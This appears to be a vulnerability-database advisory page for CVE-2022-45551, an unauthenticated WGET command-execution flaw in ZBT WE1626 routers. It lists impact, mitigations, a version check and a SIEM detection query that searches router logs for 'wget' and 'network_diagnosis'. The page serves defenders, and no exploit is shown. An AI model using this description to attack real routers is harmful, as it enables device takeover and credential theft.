CVE-2022-45551 – This vulnerability allows attackers to execute ... (How to Fix)

Q: What is the severity of CVE-2022-45551?

CVE-2022-45551 has a CVSS score of 9.8 (CRITICAL). This vulnerability allows attackers to execute arbitrary WGET commands through the Network Diagnosis endpoint, leading to privilege escalation on affected ZBT WE1626 routers. Attackers can gain administrative control over the router. Only users of ZBT WE1626 routers running vulnerable firmware are affected.

📋 TL;DR

This vulnerability allows attackers to execute arbitrary WGET commands through the Network Diagnosis endpoint, leading to privilege escalation on affected ZBT WE1626 routers. Attackers can gain administrative control over the router. Only users of ZBT WE1626 routers running vulnerable firmware are affected.

💻 Affected Systems

Products:

Shenzhen Zhiboton Electronics ZBT WE1626 Router

Versions: v21.06.18

Operating Systems: Embedded Linux

Default Config Vulnerable: ⚠️ Yes

Notes: Affects routers with default configuration exposed to network.

📦 What is this software?

We1626 Firmware by Zbt

View all CVEs affecting We1626 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of router with persistent backdoor installation, traffic interception, and lateral movement to connected devices.

🟠

Likely Case

Router takeover allowing network reconnaissance, DNS hijacking, and credential theft from connected clients.

🟢

If Mitigated

Limited impact if router is behind firewall with restricted WAN access and strong network segmentation.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires network access to router's web interface.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No official advisory found

Restart Required: No

Instructions:

Check vendor website for firmware updates. If unavailable, consider router replacement.

🔧 Temporary Workarounds

Disable Remote Administration

all

Turn off remote management features to prevent external exploitation

Access router admin panel > Advanced > Remote Management > Disable

Network Segmentation

all

Isolate router management interface from untrusted networks

Configure firewall rules to restrict access to router IP on ports 80/443

🧯 If You Can't Patch

Replace affected router with supported model
Implement strict network ACLs to limit router access to trusted IPs only

🔍 How to Verify

Check if Vulnerable:

Check router firmware version in admin interface. If version is 21.06.18, device is vulnerable.

Check Version:

curl -s http://router-ip/status.cgi | grep version

Verify Fix Applied:

Verify firmware version has been updated beyond 21.06.18

📡 Detection & Monitoring

Log Indicators:

Unusual WGET commands in system logs
Multiple failed authentication attempts to admin interface

Network Indicators:

Unexpected outbound connections from router
Unusual traffic patterns to/from router management interface

SIEM Query:

source="router.log" AND ("wget" OR "network_diagnosis")

📊 Metadata

CVE ID: CVE-2022-45551

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-306

Published: March 3, 2023

Last Updated: March 18, 2025

🔗 References

http://shenzhen.com Broken Link
http://zbt.com Vendor Advisory
https://blog.prodefense.io/zbt-we1626-wireless-router-cve-disclosures-b3534484d97d Third Party Advisory
http://shenzhen.com Broken Link
http://zbt.com Vendor Advisory
https://blog.prodefense.io/zbt-we1626-wireless-router-cve-disclosures-b3534484d97d Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-45551, you might also want to check these: